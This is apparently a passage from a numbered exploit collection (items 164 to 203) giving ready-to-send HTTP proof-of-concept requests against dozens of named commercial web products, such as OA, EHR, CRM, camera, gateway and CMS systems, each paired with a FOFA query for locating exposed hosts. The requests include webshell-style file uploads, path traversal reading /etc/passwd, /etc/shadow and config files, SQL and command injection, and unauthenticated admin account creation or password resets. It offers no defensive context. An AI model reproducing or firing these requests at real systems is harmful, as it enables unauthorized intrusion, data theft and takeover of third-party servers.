POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 293
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod

------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="name"

1.php
------iiqvnofupvhdyrcoqyuujyetjvqgocod
Content-Disposition: form-data; name="upfile"; filename="1.php"
Content-Type: image/jpeg

rvjhvbhwwuooyiioxega
------iiqvnofupvhdyrcoqyuujyetjvqgocod--

164. 慧校园 (安校易) management system FileUpProductupdate.aspx arbitrary file upload
FOFA: title="智慧综合管理平台登入"
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Content-Length: 288
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip

------dqdaieopnozbkapjacdbdthlvtlyl
Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
Content-Type: image/jpeg

<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>
------dqdaieopnozbkapjacdbdthlvtlyl--

http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx

165. OrangeHRM 3.3.3 SQL injection
CVE-2024-36428
FOFA: app="OrangeHRM-产品"
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))

166. 中成科信 ticketing management platform SeatMapHandler SQL injection
FOFA:body="技术支持:北京中成科信科技发展有限公司"
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
Host:
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 89

Method=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE

167. 精益价值管理系统 (LVS) DownLoad.aspx arbitrary file read
FOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx"
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

168. 宏景 (HJSOFT) EHR OutputCode arbitrary file read
FOFA:app="HJSOFT-HCM"
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: close

169. 宏景 (HJSOFT) EHR downlawbase SQL injection
FOFA:app="HJSOFT-HCM"
GET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

170. 宏景 (HJSOFT) EHR DisplayExcelCustomReport arbitrary file read
FOFA:body="/general/sys/hjaxmanage.js"
POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
Host: balalanengliang
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

filename=../webapps/ROOT/WEB-INF/web.xml

171. 通天星 CMSV6 vehicle positioning and monitoring platform SQL injection
FOFA:body="/808gps/"
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close

172. DT-高清车牌识别摄像机 (DT HD license-plate recognition camera) arbitrary file read
FOFA:app="DT-高清车牌识别摄像机"
GET /../../../../etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Accept-Encoding: gzip, deflate
Accept: */*
Connection: keep-alive

173. Check Point Security Gateway arbitrary file read
CVE-2024-24919
FOFA:app="Check_Point-SSL-Network-Extender"
POST /clients/MyCRL HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

aCSHELL/../../../../../../../etc/shadow

174. 金和 (Jinher) OA C6 FileDownLoad.aspx arbitrary file read
FOFA:app="金和网络-金和OA"
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close

175. 金和 (Jinher) OA C6 IncentivePlanFulfill.aspx SQL injection
FOFA:app="金和网络-金和OA"
GET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1

176. 电信网关配置管理系统 (telecom gateway configuration management system) rewrite.php file upload
FOFA:body="img/login_bg3.png" && body="系统登录"
POST /manager/teletext/material/rewrite.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT
Connection: close

------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="tmp_name"; filename="test.php"
Content-Type: image/png

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryOKldnDPT
Content-Disposition: form-data; name="uploadtime"


------WebKitFormBoundaryOKldnDPT--

177. H3C router sensitive information disclosure
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../M60.cfg
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
/userLogin.asp/../actionpolicy_status/../GR5200.cfg
/userLogin.asp/../actionpolicy_status/../GR3200.cfg
/userLogin.asp/../actionpolicy_status/../GR2200.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER5200.cfg
/userLogin.asp/../actionpolicy_status/../ER5100.cfg
/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3260.cfg
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg

178. H3C campus network self-service system flexFileUpload arbitrary file upload
FOFA:header="/selfservice"
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Content-Length: 252
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l

-----------------aqutkea7vvanpqy3rh2l
Content-Disposition: form-data; name="12234.txt"; filename="12234"
Content-Type: application/octet-stream
Content-Length: 255

12234
-----------------aqutkea7vvanpqy3rh2l--

GET /imc/primepush/%2e%2e/flex/12234.txt

179. 建文 engineering project management system arbitrary file read
POST /Common/DownLoad2.aspx HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0

path=../log4net.config&Name=

180. 帮管客 CRM jiliyu SQL injection
FOFA:app="帮管客-CRM"
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

181. 润申信息科技 enterprise standardization management system UpdataLogHandler.ashx SQL injection
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20

182. 润申科技 enterprise standardization management system AddNewsHandler.ashx arbitrary user creation
FOFA:"PDCA/js/_publicCom.js"
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded

username=test1234&pwd=test1234&savedays=1

183. 广州图创 (Interlib) library cluster management system updOpuserPw SQL injection
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
GET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

184. 迅饶科技 X2Modbus gateway AddUser arbitrary user addition
FOFA:server="SunFull-Webs"
POST /soap/AddUser HTTP/1.1
Host: your-ip
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/xml, text/xml, */*; q=0.01
Content-Type: text/xml; charset=utf-8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
X-Requested-With: XMLHttpRequest

insert into userid (USERNAME,PASSWORD,PURVIEW,LOGINDATE,LOGINTIME) values('root','123456','4','2024-5-6','11:7:56')

185. 瑞友 (Realor) 天翼 application virtualization system SQL injection
version < 7.0.5.1
FOFA:app="REALOR-天翼应用虚拟化系统"
GET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1
Host: host

186. F-logic DataCube3 SQL injection
CVE-2024-31750
F-logic DataCube3 is a compact terminal measurement system for photovoltaic power generation installations.
FOFA:title=="DataCube3"
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: application/x-www-form-urlencoded

req_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450

187. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Mura CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: your-ip
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1

188. 叁体-佳会 video conferencing attachment arbitrary file read
version <= 3.9.7
FOFA:body="/system/get_rtc_user_defined_info?site_id"
GET /attachment?file=/etc/passwd HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Connection: close

189. 蓝网科技临床浏览系统 deleteStudy SQL injection
FOFA:app="LANWON-临床浏览系统"
GET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

190. 短视频矩阵营销系统 poihuoqu arbitrary file read
FOFA:title=="短视频矩阵营销系统"
POST /index.php/admin/Userinfo/poihuoqu HTTP/2
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

poi=file:///etc/passwd

191. 亿赛通电子文档安全管理系统 NavigationAjax SQL injection
FOFA:body="/CDGServer3/index.jsp"
POST /CDGServer3/js/../NavigationAjax HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
Content-Type: application/x-www-form-urlencoded

command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=

192. 富通天下外贸ERP UploadEmailAttr arbitrary file upload
FOFA:title="用户登录_富通天下外贸ERP"
POST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/x-www-form-urlencoded

<% @ webhandler language="C#" class="AverageHandler" %>
using System;
using System.Web;
public class AverageHandler : IHttpHandler
{
public bool IsReusable
{ get { return true; } }
public void ProcessRequest(HttpContext ctx)
{
ctx.Response.Write("test");
}
}

193. 山石网科云鉴安全管理系统 setsystemtimeaction command execution
FOFA:body="山石云鉴主机安全管理系统"
GET /master/ajaxActions/getTokenAction.php HTTP/1.1
Host:
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0


POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1
Host:
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Accept: */*
Connection: close
Cookie: PHPSESSID=2333333333333;
Content-Type: application/x-www-form-urlencoded
Content-Length: 84

param=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')


GET /master/img/config HTTP/1.1
Host:
User-Agent: Mozilla/5.0

194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet arbitrary file upload
FOFA:app="FE-协作平台"
If a request to /servlet/uploadAttachmentServlet returns a response, the vulnerability is present.

POST /servlet/uploadAttachmentServlet HTTP/1.1
Host: host
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk

------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
Content-Type: text/plain

<% out.println("hello");%>
------WebKitFormBoundaryKNt0t4vBe8cX9rZk
Content-Disposition: form-data; name="json"

{"iq":{"query":{"UpdateType":"mail"}}}
------WebKitFormBoundaryKNt0t4vBe8cX9rZk--

195. 飞鱼星上网行为管理系统 send_order.cgi command execution
FOFA:title=="飞鱼星企业级智能上网行为管理系统"
POST /send_order.cgi?parameter=operation HTTP/1.1
Host: 127.0.0.1
Pragma: no-cache
Cache-Control: no-cache
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 68

{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}

196. 河南省风速科技统一认证平台 password reset
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: application/json;charset=UTF-8
X-Requested-With: XMLHttpRequest
Host:
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 45
Connection: close

{"xgh":"test","newPass":"test666","email":""}

197. 浙大恩特客户资源管理系统 Quotegask_editAction SQL injection
FOFA:app="浙大恩特客户资源管理系统"
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close

198. 阿里云盘 WebDAV command injection
CVE-2024-29640
GET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.1
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64
Accept: */*
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Connection: close

199. cockpit assetsmanager_upload interface file upload
Fofa:title="Authenticate Please!"

1. Run the POC to obtain the CSRF token, then obtain the cookie, then upload the file and request it to see the result:
GET /auth/login?to=/ HTTP/1.1

Response: 200, returned value: csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"

2. Use the JWT obtained in the previous step to obtain the cookie:

POST /auth/check HTTP/1.1
Content-Type: application/json

{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}

Response: 200, returned value:
Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/

3. Upload with the obtained cookie:
POST /assetsmanager/upload HTTP/1.1
Content-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb3
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92

-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="files[]"; filename="tttt.php"
Content-Type: text/php

<?php echo "tttt";unlink(__FILE__);?>
-----------------------------36D28FBc36bd6feE7Fb3
Content-Disposition: form-data; name="folder"


-----------------------------36D28FBc36bd6feE7Fb3--

/storage/uploads/tttt.php

200. SeaCMS海洋影视管理系统 dmku SQL injection
FOFA:app="海洋CMS"
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9

201. 方正全媒体新闻采编系统 binary SQL injection
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
POST /newsedit/newsplan/task/binary.do HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=1

202. 微擎系统 AccountEdit arbitrary file upload
FOFA:body="/Widgets/WidgetCollection/"
Obtain the __VIEWSTATE and __EVENTVALIDATION values:
GET /User/AccountEdit.aspx HTTP/1.1
Host: 滑板人之家
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31
Content-Length: 0

Replace the __VIEWSTATE and __EVENTVALIDATION values in the following request:
POST /User/AccountEdit.aspx HTTP/1.1
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687

-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__VIEWSTATE"

__VIEWSTATE
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="__EVENTVALIDATION"

__EVENTVALIDATION
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
Content-Type: text/plain

Hello World!
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"

上传图片
-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"


-----------------------------786435874t38587593865736587346567358735687
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"


-----------------------------786435874t38587593865736587346567358735687--

/_data/Uploads/1123.txt

203. 红海云EHR PtFjk file upload
FOFA:body="RedseaPlatform"
POST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1
Host: x.x.x.x
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Length: 210

------WebKitFormBoundaryt7WbDl1tXogoZys4
Content-Disposition: form-data; name="fj_file"; filename="11.jsp"
Content-Type:image/jpeg

<% out.print("hello,eHR");%>
------WebKitFormBoundaryt7WbDl1tXogoZys4--
